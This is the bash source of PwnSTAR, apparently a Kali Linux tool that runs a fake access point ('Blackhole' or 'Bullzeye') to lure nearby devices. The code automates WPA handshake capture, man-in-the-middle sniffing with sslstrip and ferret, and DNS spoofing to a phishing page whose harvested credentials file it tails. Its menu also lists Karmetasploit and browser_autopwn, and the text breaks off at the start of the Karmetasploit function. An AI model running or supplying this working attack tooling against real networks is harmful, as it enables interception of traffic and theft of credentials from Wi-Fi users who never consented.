pwnstar

#!/bin/bash

# PLEASE READ AND STUDY BEFORE LAUNCHING

# See the README.txt for hints on usage

# --------------------------------------------------------------------------------------------------------------------#
# Version: 20140428
#
# Copyright (C) 2014  VulpiArgenti

# This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public 
# License as published by the Free Software Foundation; either version 2 of the License, or any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied 
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
# --------------------------------------------------------------------------------------------------------------------#

# Disclaimer:   This script is intended for use only for private study or during an authorised pentest. The author bears no responsibility for malicious or illegal use.
#               Skiddies should look elsewhere.


#  ===========================================================================================  #
#                                 "...On The Shoulders Of Giants..."                            #
#  ===========================================================================================  #

#               Large chunks copied directly from snafu777's quickset script                    #
#                                                                                               #
#               I couldn't improve on his code, and gave up trying                              #

#  ===========================================================================================  #

# --------------------------------------------------------------------------------------------------------------------#

# Indebted to everyone else who has contributed scripts to the wonderful community at BT Forums, especially:

#           comaX
#           ericmilam
#           LHYX1
#           deathcorps
#           g0tmi1k
#           killadaninja

# --------------------------------------------------------------------------------------------------------------------#

# Many thanks to all on the BackTrack forum who gave feedback.

# --------------------------------------------------------------------------------------------------------------------#

#   Prerequisites
   # ~~~~~~~~~~~~~ #

# I amused myself by playing with colours. You may get unexpected results if you have different terminal effects.
# In Eterm adjust the background settings: transparency off, pixmap none; then "save theme settings". This gives a blank background to show the script colours.
# In the shell, a plain black or white background works best.
# The script attempts to set these backgrounds automatically.

# Designed for Kali-linux only. PwnSTAR_0.84 will run on BackTrack 5R2 and 5R3. It is assumed you have all standard tools installed.

# Additional requisites: incrontab (+ dhcp-server obviously). The script will install these. Can use airdrop-ng if you have it installed.


# Ignore "###" - this is note to self.

#   Bugs
  # ~~~~~~~~~~~~~ #
 
# If an invalid value is entered when setting up interfaces, the script sometimes loops and spawns mon1 or even mon2. I haven't managed to fix this: advice welcomed.
# This doesn't usually cause problems, but if concerned, then re-insert usb cards and start again, without fat-fingering the entry!

#   Setting up webserver
  # ~~~~~~~~~~~~~~~~~~~~ #

# The script uses a variable called "textfile". This refers to the simple file that the php writes to. 
# See my post on the BT forums for an example.
# Keep all related files (including the index) in a single directory eg "phishing". 
# Place the phishing directory into /var/www. Check permissions are correct.

# DO NOT place the index file separately into its usual position in /www; the script will copy it into position.
# This allows you to build up a number of phishing directories, with the index safely inside each of them. 
# Thus avoiding the risk of deleting the only copy from /www.


# Flames and praise welcome - kali forums:- https://forums.kali.org/showthread.php?1406-PwnSTAR-running-on-Kali

# Regards
# Vulpi

############################################################################################################

# ~~~~~~~~~~  Environment Setup ~~~~~~~~~~ #

# Text color variables - saves retyping these awful ANSI codes

txtrst="\e[0m"      # Text reset

def="\e[40;1;34m"       # default           blue
warn="\e[40;1;31m"      # warning           red
info="\e[40;1;34m"      # info              blue
q="\e[40;1;32m"         # questions         green
inp="\e40;1;36m"        # input variables   magenta

# Zap the psychadelic Eterm background
echo "<Eterm-0.9.6>
# Eterm Configuration File
begin imageclasses
    begin image
      type background
      mode solid
      state normal
    end image
end" > /usr/share/Eterm/themes/Eterm/user.cfg

printf "\e[8;40;85;t"       # resize terminal
echo -e "\e[0;40m"          # background black
clear

# ~~~~~~~~~~ Intro ~~~~~~~~~~ #

banner_fn()
{
        echo -e "\e[1;37m 
        ~~~~~~~~~~~~~~~~~~~~~~~VulpiArgenti~~~~~~~~~~~~~~~~~~~~~                                                                 
           _____                   _____ _______       _____  
          |  __ \                 / ____|__   __|/\   |  __ \ 
          | |__) |__      ___ __ | (___    | |  /  \  | |__) |
          |  ___/ \ \ /\ / / '_ \ \___ \   | | / /\ \ |  _  / 
          | |      \ V  V /| | | |____) |  | |/ ____ \| | \ \ 
          |_|       \_/\_/ |_| |_|_____/   |_/_/    \_\_|  \_\        
         
        ~~~~~~~~~~~~~~~~~~~~Pwn_SofT_Ap_scRipt~~~~~~~~~~~~~~~~~~

"
sleep 1
}

first_fn()
{       
    # Trap Ctrl-C
    trap exit_fn INT 
    # Clear iptables
    iptables --flush    # delete all rules in default (filter) table
    iptables -t nat --flush
    iptables -t mangle --flush
    iptables -X         # delete user-defined chains
    iptables -t nat -X
    iptables -t mangle -X
    
    if [[ ! -x /usr/sbin/dhcpd ]];then
        echo -e "$warn\nNeed to install isc-dhcp-server"
        sleep 1
        echo -e "$q\nDo you want to do it now? (y/n)"
        read var
        if [[ $var == y ]];then
            apt-get install isc-dhcp-server
        else
            exit_fn
        fi
    fi
        
    apusage= # set to null
    echo -e "$info\nPress ctrl-C at any time to exit neatly\n"
    sleep 0.5
    echo -e "$q\nHow do you want to use the AP?"
    echo -e "$def
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                   Basic Menu
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        
    1) Honeypot: get the victim onto your AP, then use nmap, metasploit etc \n
                 no internet access given
        
    2) Grab WPA handshake
        
    3) Sniffing: provide internet access, then be MITM
        
    4) Simple web server with dnsspoof: redirect the victim to your webpage
        
    5) Karmetasploit
    
    6) Browser_autopwn
         
     
    9) ADVANCED menu
    
    q) Exit from the script     "
    
    read apusage
    if [[ $apusage = q ]];then
            exit_fn
    elif [[ $apusage != [1-6] && $apusage != 9 ]];then
        first_fn
    elif [[ $apusage = 9 ]];then
        adv_usage_fn
    fi
    setup_fn
}

setup_fn()
{
    clear
    echo "1" > /proc/sys/net/ipv4/ip_forward # enable kernel forwarding
    interface_fn
    initial_scan_fn
    ap_presets_fn
    if [[ $apusage = 2 ]];then
        echo -e  "$warn\nRemember to start the AP with WPA/WPA2 encryption"
        sleep 2
    fi
    ap_setup_fn
    ap_type_fn
    ap_start_fn
    dhcp_presets_fn
    dhcp_setup_fn
    dhcp_start_fn

    case $apusage in 
    
        1)  clear
            echo -e "$info\nWatch the DHCP tail for visitors, and then play with them!!";;
        
        2)  clear
            echo -e "$info\nMonitor airbase eterm for client associations"
            sleep 1
            echo -e "$info\nHandshakes will be saved in /root/PwnSTAR-n.cap"
            sleep 1
            echo -e "$info\nConsider de-authing clients"
            sleep 4;;
                        
        3)  sniff_fn;;
                
        4)  directory_select_fn
            apache_fn
            dns_fn
            tail_txtfile_fn;;
            
        5)  karmalaunch_fn;;
        
        6)  browser_autopwn_fn;;
        
        a)  portals_fn;;
        
        b)  pdf_fn;;
        
        c)  zday_fn;;
        
        d)  java_jre17_jmxbean_fn;;
        
        e)  browser_exploit_fn
        
    esac
    
    sleep 8
    echo
    final_fn
}

# ~~~~~~~~~~ Interface Functions ~~~~~~~~~~ #

dev_check_fn() # from "quickset" - checks device exists
{
    ifconfig $dev_check_var &> /dev/null  # &> redirects stdout and stderr; prevents screen clutter
    if [ $? -ne 0 ];then
        echo -e "$warn\nDevice does NOT exist"
        sleep 1
        dev_check="fail"
    else
        dev_check= # nulled
    fi
}       

interface_fn()
{
    API= # AP interface
    ICI= # Internet-connected interface
    internet=
    
    if [[ $apusage != [1-2] ]];then
        echo -e "$q\nAre we giving internet access? (y/n)"
        read internet
        
        if [[ $internet = "y" ]]; then
            if [[ -z $ICI ]];then
                echo -e "$def\nAvailable interfaces:"
                ifconfig -a | grep eth | awk '{ print $1"   "$5 }' 2>/dev/null                
                ifconfig -a | grep wlan | awk '{ print $1"   "$5 }'
                echo -e "$q\nEnter internet connected interface"
                read ICI
                dev_check_var=$ICI
                dev_check_fn
                if [[ $dev_check = "fail" ]]; then
                    ICI=
                    internet=
                    dev_check=
                    interface_fn
                fi
            fi
            
            if [[ $ICI = "eth0" ]];then
                echo -e "$warn\nNot macchanging $ICI. Do it yourself if required" # prevents connection problems from macchanging eth0 in a VM
                sleep 2
            else
                echo -e "$info\nMacchanging $ICI..."
                ifconfig $ICI down && macchanger -A $ICI && ifconfig $ICI up
                sleep 2
                echo -e "$warn\nYou need to reconnect internet\n(ignore networkmanager applet)\n\n       DO IT NOW\n"
                sleep 2
                echo -e "$warn\nIf having problems, RESTART networking in nm-applet, or use Wicd"
                sleep 1
            fi
            # store random internet MAC as ici_mac
            ici_mac=$(ifconfig $ICI | awk '{print $5}')
            sleep 0.5
            ici_mac=$(echo $ici_mac | awk '{print $1}')
            
        elif [[ $internet = n ]];then
            echo -e "$warn\nAre you sure..?"
            sleep  0.5
            echo -e "$q\nPress y)es I'm sure, continue \n   or n)o, set up internet  "
            read var
            if [[ $var = n ]];then
                internet=
                interface_fn
            elif [[ $var = y ]];then
                if [[ $apusage = 3 || $apusage = a || $apusage = b || $apusage = c ]];then
                    echo -e "$warn\nDuh, won't work without an internet interface. Start again"
                    sleep 2
                    interface_fn
                fi
            fi
        elif [[ $internet = * ]];then
            echo -e "$warn\nBooBoo"
            sleep 2
            interface_fn
        fi
    fi
        
    if [[ -z $API ]]; then
        echo -e "$def\nAvailable wireless interfaces:"
        ifconfig -a | grep wlan | awk '{ print $1"   "$5 }' # displays available interfaces
        echo -e "$q\nWireless interface to use for AP?"
        read API
        dev_check_var=$API
        dev_check_fn
        if [[ $dev_check = "fail" ]];then
            echo -e "$warn\nStart again"
            sleep 1
            API= # nulled
            ICI=
            interface=
            dev_check=
            interface_fn
        fi
    fi
    if [[ $API = $ICI ]]; then # can't use same interface for internet and AP
        echo -e "$warn\n$API is in use, stupid. Try another interface"
        sleep 2
        interface_fn
    fi
    echo -e "$info\nStarting monitor mode..." # automatically assigns the mon interface to "monap"
    monap=$(airmon-ng start $API|grep enabled|awk '{ print $5"" }'|cut -c -4)
    dev_check_var=$monap
    dev_check_fn
    if [[ $dev_check == "fail" ]];then
        monap= 
        interface_fn
    fi

    echo -e "$info\nBest to macchange $API and $monap..."
    if [[ -z $rand ]];then
        echo -e "$q\nRandom MAC? (y). Or manual (m)"
        read rand
    fi
    case $rand in
        y|Y) ifconfig $API down && macchanger -A $API && ifconfig $API up
             sleep 6     # crucial, to let API come up before setting ap_mac 
             ap_mac=$(ifconfig $API | awk '{print $5}')  # reads the random mac so it can be assigned to all subsequent interfaces
             sleep 0.5
             ap_mac=$(echo $ap_mac | awk '{print $1}')   # thanks to snafu777 quickset
             sleep 0.5
             ifconfig $monap down && macchanger -m $ap_mac $monap && ifconfig $monap up;;
    
        m|M) while [ -z $ap_mac ];do
                echo -e "$q\nDesired MAC Address for $inp $API $q?"
                read ap_mac
            done
            if [[ "$ap_mac" =~ ^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$ ]]; then    # checks a sane value has been entered for mac
                ifconfig $API down && macchanger -m $ap_mac $API && ifconfig $API up
            else
                echo -e "Invalid MAC address!"
                ap_mac=
                rand=               
                sleep 2
                interface_fn
            fi
            sleep 3 ### not necessary?
            ifconfig $monap down && macchanger -m $ap_mac $monap && ifconfig $monap up;;
                 
        *)  echo -e "$warn\nInvalid. Start again."
            rand=
            airmon-ng stop $mon_ap &> /dev/null
            sleep 2
            interface_fn;;
    esac
    sleep 0.5
}

# ~~~~~~~~~~ Scan Functions ~~~~~~~~~~ #

initial_scan_fn()
{
    echo -e "$warn\nNote: best to start the AP on the same channel as the target $q\n\nDo you want to scan eg to discover target channel, ESSID etc? (y/n) "
    read initial_scan
    if [ $initial_scan = "y" ];then
        monscan_start_fn
        
        Eterm -g 100x20-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0 --scrollbar 0 -q -T "Scan" -e airodump-ng "$monscan" 2> /dev/null &
        var=1
        while [[ -n $var ]];do # Clumsy I know. Enter zero's $var, ending the loop
            echo -e "$q\nPress enter to close the scan and continue"
            read var
        done
        # close airodump before allowing to proceed - prevents later problems with different channels on the same physical device
        killall -9 airodump-ng &> /dev/null # output redirected so not seen in the terminal
        killall -9 Eterm &> /dev/null   # the previous "killall airodump" can leave the eterm open 
    
    elif [[ $initial_scan != n ]];then  # any value other than n restarts the function
        echo -e "$warn\nWhat's it gunna be babe...yes or no?"
        sleep 2
        initial_scan_fn
    fi
}

monscan_start_fn()
{
    if [[ -z $monscan ]];then # check hasn't been started in a previous loop through the script
        echo -e "$info\nStarting new monitor interface for scanning..."
        monscan=$(airmon-ng start $API|grep enabled|awk '{ print $5"" }'|cut -c -4)
        dev_check_var=$monscan
        dev_check_fn
        if [[ $dev_check == "fail" ]]; then
            monscan=
            initial_scan_fn
        fi
        sleep 1
        echo -e "$info\nMacchanging $monscan...\n"
        ifconfig $monscan down && macchanger -m $ap_mac $monscan && ifconfig $monscan up # give same mac as other AP interfaces
    fi
}

rescan_fn()
{
    echo -e "$q\nScan on: 1) channel $apchan only\n      or 2) All channels"
    read var
    if [[ $var != 1 && $var != 2 ]];then
        echo -e "$warn\nWhat's it gunna be babe...1 or 2?"
        sleep 2
        rescan=
        rescan_fn
    fi
    if [[ -z $monscan ]];then
        monscan_start_fn
    fi
        
    killall -q airodump-ng &> /dev/null # stop any pre-existing scan
    kill -9 $scanpid &> /dev/null       # stop any pre-existing scan Eterm
    clear
    if [[ $var = 1 ]];then
        Eterm -g 90x30-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -T "Scan channel $apchan" -e airodump-ng "$monscan" -c $apchan 2> /dev/null & scanpid=$!
    else
        Eterm -g 90x30-0-0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -T "Scan channel hop" -e airodump-ng "$monscan" 2> /dev/null & scanpid=$!
    fi
}
    

# ~~~~~~~~~~ AP Functions ~~~~~~~~~~ #

ap_presets_fn()
{
    # Set your defaults here
    ap_ip="192.168.0.1"             # SoftAP IP Address
    ap_sm="255.255.255.0"           # SoftAP Subnet Mask
    apchan=                         # SoftAP Channel
    mtu_size=1400                   # MTU Size
    if [[ $apusage = 2 ]];then      # encryption type
            encrypt="WPA2"
    Z="-Z 4 -W 1 -F PwnSTAR" # variable for airbase: "Z 4 -W 1" basically means WPA2, -F saves a cap file
    else
            encrypt="open"
    Z=              
    fi
    echo -e "$info\nInterfaces set up; let's move onto the AP"
    sleep 1
    clear
}

ap_setup_fn()
{
    clear
    echo -e "$def

Set the Soft AP Parameters:
        
    1) SoftAP IP Address      \e[1;36m[$ap_ip]
    $def
    2) SoftAP Subnet Mask     \e[1;36m[$ap_sm]
    $def
    3) SoftAP Channel         \e[1;36m[$apchan]
    $def
      *It is recommended you start the AP on the same channel as the target*
    
    4) MTU Size               \e[1;36m[$mtu_size]
    $def
    5) Encryption type        \e[1;36m[$encrypt]       $WEPpswd
    $def
    
    C)ontinue\n"
        read var
        case $var in
        
            1) echo -e "$q\nSoftAP IP Address?"
            read ap_ip
            ap_setup_fn;;
    
            2) echo -e "$q\nSoftAP Subnet Mask?"
            read ap_sm
            ap_setup_fn;;
    
            3) echo -e "$q\nSoftAP Channel?"
            read apchan
            case $apchan in
                    [1-9]|1[0-4]) ;;
                    *) apchan= ;; 
            esac
            ap_setup_fn;;
    
            4) echo -e "$q\nDesired MTU Size?"
            read mtu_size
            if [[ $mtu_size -lt 42 || $mtu_size -gt 6122 ]];then
                mtu_size=
            fi
            ap_setup_fn;;
            
            5) echo -e "$q\nEncryption type?
                    Open
                    WEP40
                    WEP104
                    WPA (for handshake grabbing only)
                    WPA2 (for handshake grabbing only)"
            read encrypt
            if [[ $encrypt = "Open" ]];then
                Z=
            elif [[ $encrypt = "WEP40" ]];then
                echo -e "$q\nEnter password (10 character hexadecimal)"
                read WEPpswd
                # error check password
                if [[ $(echo $WEPpswd | wc -m) != 11 ]];then # wc counts the return, therefore 11 not 10
                    echo -e "$warn\nInvalid password"
                    sleep 2
                    WEPpswd=
                    encrypt=
                    ap_setup_fn
                else
                    Z="-w "$WEPpswd""       # safer to quote the password so there isn't unpredictable expansion ###check this quoting works. brackets instead?
                fi
            elif [[ $encrypt = "WEP104" ]];then
                echo -e "$q\nEnter password (26 character hexadecimal)"
                read WEPpswd
                # error check password
                if [[ $(echo $WEPpswd|wc -m) != 27 ]];then # counts return, therefore 27 not 26
                    echo -e "$warn\nInvalid password"
                    sleep 1
                    WEPpswd=
                    encrypt=
                    ap_setup_fn
                else
                    Z="-w "$WEPpswd""               # -w sets WEP password
                fi
            elif [[ $encrypt = "WPA" ]];then
                Z="-z 2 -W 1 -F PwnSTAR"    # -W sets WEP flag (see man airbase-ng), z 2 means WPA
            elif [[ $encrypt = "WPA2" ]];then
                Z="-Z 4 -W 1 -F PwnSTAR"
            elif [[ $encrypt = * ]];then
                echo -e "$warn\nInvalid selection"
                sleep 1
                encrypt=
            fi
            ap_setup_fn;;
    
            c|C) if [[ -z $ap_ip || -z $ap_sm || -z $apchan || -z $mtu_size || -z $encrypt ]];then # check all variables are set
                echo -e "$warn\nNot so fast, all fields must be filled before proceeding"
                sleep 2
                ap_setup_fn
                fi;;
        
    *) ap_setup_fn;;
    
    esac
}

ap_type_fn()
{
    BB= # nulled; if this is repeat run-through, BB would exist, and the while loop would not trigger 
    while [ -z $BB ];do
        echo -e "$q 

Choose the \033[4mtype\033[0m\033[40;1;32m of AP: 

    1) Blackhole--> Responds to All probe requests

    2) Bullzeye--> Broadcasts only the specified ESSID

    3) Both--> Responds to all, otherwise broadcasts specified\n"
                
        read BB
    done

    case $BB in
        [1-3]) ;;
        *) ap_type_fn;;
    esac
}

ap_start_fn()
{
    if [[ $internet = y ]];then
            # forward at0 to the internet
            iptables -t nat -A POSTROUTING -o $ICI -j MASQUERADE
    fi

    # blackhole targets every probe request
    if [ $BB == "1" ]; then
            Eterm -g 80x12-0+0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -q -T "Blackhole AP" -e airbase-ng $Z -c $apchan -P -C 60 -v $monap 2> /dev/null 2> /dev/null &
            clear
            
    # bullzeye broadcasts specified ESSID only
    elif [ $BB == "2" ]; then
            while [ -z $SSID ];do
                    echo -e "$q\nDesired ESSID?"
                    read SSID
            done
            Eterm -g 80x12-0+0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -q -T "Bullzeye AP $SSID" -e airbase-ng $Z -c $apchan -e "$SSID" -v $monap 2> /dev/null &
            clear
            
    # both
    elif [ $BB == "3" ];then 
            while  [ -z "$SSID" ];do
                    echo -e "$q\nDesired ESSID eg Free Public WiFi?"
                    read SSID
            done
            Eterm -g 80x12-0+0 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -q -T "Both AP $SSID" -e airbase-ng $Z -c $apchan -e "$SSID" -P -C 60 -v $monap 2> /dev/null &
            clear
    fi
    
    echo -e "$info\nOK, We're finally starting airbase-ng..."
    sleep 6 # for at0 to be started - crucial
    modprobe tun            # probably not necessary
    ifconfig at0 up $ap_ip netmask $ap_sm
    ifconfig at0 mtu $mtu_size
}

# ~~~~~~~~~~ DHCP Functions ~~~~~~~~~~ #

dhcp_presets_fn()
{
    apnet="192.168.0.0"                         # DHCP Subnet 
    aprange="192.168.0.100 192.168.0.200"       # DHCP IP range
}

dhcp_setup_fn()
{
    clear
    echo -e "$def

Check DHCP Server Parameters:


    1) Gateway IP Address  \e[1;36m[$ap_ip]
$def
    2) Subnet Mask         \e[1;36m[$ap_sm]
$def
    3) Subnet              \e[1;36m[$apnet]
$def
    4) IP Range            \e[1;36m[$aprange]
$def
    C)ontinue

\n"
    read var
    case $var in
    
        1) echo -e "\033[36m\nGateway IP Address?"
        read ap_ip
        dhcp_setup_fn;;
    
        2) echo -e "\033[36m\nSubnet Mask?"
        read ap_sm
        dhcp_setup_fn;;
    
        3) echo -e "\033[36m\nSubnet?"
        read apnet
        dhcp_setup_fn;;
    
        4) echo -e "\033[36m\nIP Range?"
        read aprange    
        dhcp_setup_fn;;

        c|C) if [[ -z $ap_ip || -z $ap_sm || -z $apnet || -z $aprange ]];then
                echo -e "\033[31mGet a grip - you've missed something"
                sleep 1
                dhcp_setup_fn
            fi;;
    
        *) dhcp_setup_fn;;
    esac
}

dhcp_start_fn()
{
    echo > /var/lib/dhcp/dhcpd.leases  # Clear any pre-existing dhcp leases
    cat /dev/null > /tmp/dhcpd.conf

    # need a working nameserver from our internet connection
    var=$(grep "nameserver" /etc/resolv.conf | awk '{print $2}' |wc -l) # count the number of nameservers in resolv.conf
    if [[ $var = 1 ]];then  # if 1, use it in dhcpd.conf
        apdns=$(grep nameserver /etc/resolv.conf | awk '{print $2}')
    elif [[ $var > 1 ]];then  # if more than 1 nameserver, manipulate string into an acceptable form for dhcpd.conf
        apdns=$(grep nameserver /etc/resolv.conf | awk '{print $2}' | tr '\n' ',')      # replace newlines with commas
        apdns=${apdns//,/", "}                                                          # add a space after all commas
        apdns=${apdns%", "}                                                             # delete the final comma/space
    else apdns="8.8.8.8"        # default in case resolv.conf is empty
    fi
        
    echo -e "$info\nGenerating /tmp/dhcpd.conf"
    echo -e "$info\nStarting DHCP server..."
    echo "default-lease-time 300;"> /tmp/dhcpd.conf
    echo "max-lease-time 360;" >> /tmp/dhcpd.conf
    echo "ddns-update-style none;" >> /tmp/dhcpd.conf
    echo "authoritative;" >> /tmp/dhcpd.conf
    echo "log-facility local7;" >> /tmp/dhcpd.conf
    echo "subnet $apnet netmask $ap_sm {" >> /tmp/dhcpd.conf
    echo "range $aprange;" >> /tmp/dhcpd.conf
    echo "option routers $ap_ip;" >> /tmp/dhcpd.conf
    echo "option domain-name-servers $apdns;" >> /tmp/dhcpd.conf
    echo "}"  >> /tmp/dhcpd.conf

    dhcpd -cf /tmp/dhcpd.conf &
    route add -net $apnet netmask $ap_sm gw $ap_ip
    iptables -P FORWARD ACCEPT  # probably not necessary 'coz we flushed the chains earlier
    if [[ $apusage = 4 ]];then
        iptables -t nat -A PREROUTING -i at0 -j REDIRECT        ### ???helps to avoid DNS cache. Still a problem.
    fi
    sleep 1         # for dhcpd to start
    
    # tail leases
    Eterm -g 80x8-0+225 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 -r --font-fx none --buttonbar 0  --scrollbar 0 -q -T "DHCP Server Tail" -e tail -f /var/lib/dhcp/dhcpd.leases 2> /dev/null &
    echo -e "$info\n\nSoft AP is now running :-)"       
    sleep 2
    clear
}

# ~~~~~~~~~~ Sniffing Functions ~~~~~~~~~~ #

sniff_fn()
{
    echo -e "$warn\nCheck internet is connected on $ICI"
    sleep 1
    # Ferret
    echo -e "$q\nStart ferret on at0? (y/n)"
    read ferret
    if [[ $ferret = y ]];then
        Eterm -g 80x14-0+373 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -q -T "Ferret" -e ferret -i at0 --channel $apchan 2> /dev/null & 
        sleep 1
    elif [[ $ferret != n ]];then # any value other than n restarts the function
        echo -e "$warn\nWhat's it gunna be babe...yes or no?"
        sleep 2 
        sniff_fn
    fi
    
    # SSLStrip           
    echo -e "$q\nStart sslstrip? (y/n)"
    read sslstrip
    if [[ $sslstrip = y ]];then
        if [[ $apusage = a || $apusage = b ]];then  # captive portal with some iptables rules already set
            echo "y" > /tmp/sslstrip    # stores $sslstrip
            sleep 0.5
            mac=$(cat /tmp/ip/ip)
            iptables -t nat -I PREROUTING -p tcp --destination-port 80 -m mac --mac-source $mac -j REDIRECT --to-port 10000 2> /dev/null & 
            # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 ###
        else                        # standard sslstrip rule
            iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
        fi
        sslstrip -k -f 2> /dev/null &  
        sleep 2 # give time for sslstrip to start
        echo -e "$q\nTail sslstrip.log? (y/n))"
        read var
        if [[ $var = y ]];then
                Eterm -g 80x8-0+770 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 -r --font-fx none --buttonbar 0  --scrollbar 0 -q -T "Sslstrip Tail" -e tail -f /root/sslstrip.log 2> /dev/null &
        fi
    elif [[ $sslstrip != n ]];then # any value other than n restarts the function
        echo -e "$warn\nWhat's it gunna be babe...yes or no?"
        sleep 2
        sniff_fn
    fi
    sleep 2
    echo -e "$info\nSniffing started"
    sleep 1
    if [[ $ferret = y ]]; then
        echo -e "$info\nFerret will save a pcap dump in /root"
        sleep 1
    fi
    if [[ $sslstrip = y ]];then
        echo -e "$info\nSslstrip log is in /root"
        sleep 1
    fi
    echo -e "$info\nConsider using yamas or easy-creds to parse logs"
    sleep 4
}

# ~~~~~~~~~~ Web Server Functions ~~~~~~~~~~ #

directory_select_fn()   
# Must set up directory structure properly!!! See intro notes.
{
    echo -e "$info\nSetting up the web page"
    sleep 0.5
    echo -e "$warn\nMUST have directory structure set up correctly"
    sleep 1
    if [[ $apusage == 4 ]];then 
        echo -e "$info\nUse hotspot_3, or your own website"
        sleep 0.5
    fi
    echo -e "$info\nAvailable web directories:\n\n$(ls /var/www)"
    sleep 0.5
    echo -e "$q\nSelect directory"
    read wwwdir
    if [[ -d /var/www/"$wwwdir" ]];then
        mkdir /var/www/backups &>/dev/null          # make backup directory NB clear this out occasionally
        mv /var/www/index.html /var/www//backups/index.html.`date +%Y%m%d%H%M` &>/dev/null  # back-up existing index files
        mv /var/www/index.php /var/www/backups/index.php.`date +%Y%m%d%H%M` &>/dev/null 
        cp /var/www/"$wwwdir"/index.* /var/www/     #copy index from phishing folder to var/www
        if [[ $? -ne 0 ]] ;then                     # checks exit code of last command ie did it work?
            echo -e "$warn\nError copying index"
            sleep 2
            directory_select_fn
        else 
            echo -e "$info\n"$wwwdir"/index moved into position"
            sleep 1
        fi
    else echo -e "$warn\nDirectory doesn't exist, eedjit" 
        sleep 2
        directory_select_fn     
    fi
}

apache_fn()
{
    apache=$(ps aux|grep "/usr/sbin/apache2"|grep www-data) # check whether apache is running
    if [[ -z "$apache" ]] ;then                             # if not,
        echo -e "$info\n"
        service apache2 start
        echo -e "$info"
        sleep 2
        apache=$(ps aux|grep "/usr/sbin/apache2"|grep www-data) # check has successfully started
        if [[ -z "$apache" ]] ;then
            echo -e "$warn\nApache failed to start - please resolve, then try again"
            sleep 4
            exit_fn
        else
            echo -e "$info\n...success"
        fi
    else
        echo -e "$info\nApache already running"
    fi
}

tail_txtfile_fn()
{
    echo -e "$q\nDo you want to tail the credentials txtfile? (y/n)"
    read txttail
    if [[ $txttail = y ]];then
        echo -e "$def\n"
        ls /var/www/$wwwdir
        echo -e "$q\nEnter name of txtfile \n(usually formdata.txt)"
        read txtfile
        var="$(ls /var/www/$wwwdir|grep "$txtfile")" # tests whether $txtfile is valid 
        if [[ $var == "$txtfile" ]];then
            Eterm -g 80x4-0+493 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 -r --font-fx none --buttonbar 0  --scrollbar 0 -q -T "Textfile Tail" -e tail -f /var/www/"$wwwdir"/"$txtfile" 2> /dev/null &
        else 
            echo -e "$warn\nBad typing - $txtfile doesn't exist"
            sleep 1
            tail_txtfile_fn
        fi
    elif [[ $txttail != n ]];then
        tail_txtfile_fn
    fi
    sleep 1
    echo -e "$info\nWeb Server attack running" 
}

dns_fn()
{
    echo -e "$q\nDNSspoof: do you want to spoof 
    
    1) all addresses
    2) use a custom hosts file"
    read var
    if [[ $var = 1 ]];then
        echo -e "$info\nStarting DNS spoofing..."
        Eterm -g 80x6-0+373 -f DarkOrchid4 --pointer-color "dark orange" -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -q -T "DNSspoof" -e dnsspoof -i at0 2> /dev/null & 
    elif [[ $var = 2 ]];then
        echo -e "$q\nFor the hosts file
    1) I will supply it
    2) Let's make one"
        read var
        echo $var
        if [[ $var = 1 ]];then
            echo -e "$info\nEnter the absolute path to the file"
            read dnspath
            if [[ -z $dnspath ]];then
                echo -e "$warn\nFile doesn't exist. Start again"
                sleep 2
                dns_fn
            fi
                
        elif [[ $var = 2 ]];then
            echo -e "$info\nWe will now enter the address(es), one at a time.\ne.g. www.microsoft.com\nCan use wildcards e.g. ???.microsoft.*$warn\nEnter a blank to escape from the loop."
            until [[ $var = "" ]];do    # loops until blank entered
                echo -e "$info\nEnter (next) address:\n(Enter a blank address to finish)"
                read var
                if [[ -n $var ]];then
                    echo "192.168.0.1 $var" >> /tmp/custom.hosts
                fi 
            done
            echo -e "$info\nHere is the file:\n"
            cat /tmp/custom.hosts
            echo -e "$info\nIf you don't like it, edit it directly (/tmp/custom.hosts)\nPress enter to continue."
            read
            dnspath=/tmp/custom.hosts
           
        elif [[ $var != 1 && $var != 2 ]];then
            echo -e "$warn\nBad choice. Start again"
            sleep 2
            dns_fn
        fi
        echo -e "$info\nStarting DNS spoofing..."
        Eterm -g 80x6-0+373 --pointer-color "dark orange" -f DarkOrchid4 -b LightYellow1 --font-fx none --buttonbar 0  --scrollbar 0 -q -T "DNSspoof" -e dnsspoof -i at0 -f $dnspath 2> /dev/null & 
    elif [[ $var != 1 && $var != 2 ]];then
        echo -e "$warn\nBad choice. Start again"
        sleep 2
        dns_fn  
    fi
}


# ~~~~~~~~~~ Karmetasploit ~~~~~~~~~~ #

# browser_autopwn may become deprecated soon
# it won't work against modern patched OS's
    
karmalaunch_fn()
{
    iptables -t nat -A PREROUTING -i at0 -j REDIRECT
    service apache2 stop # will interfere with metasploit's server
    cat /dev/null > /tmp/karma.rc > /dev/null # clear pre-existing karma.rc
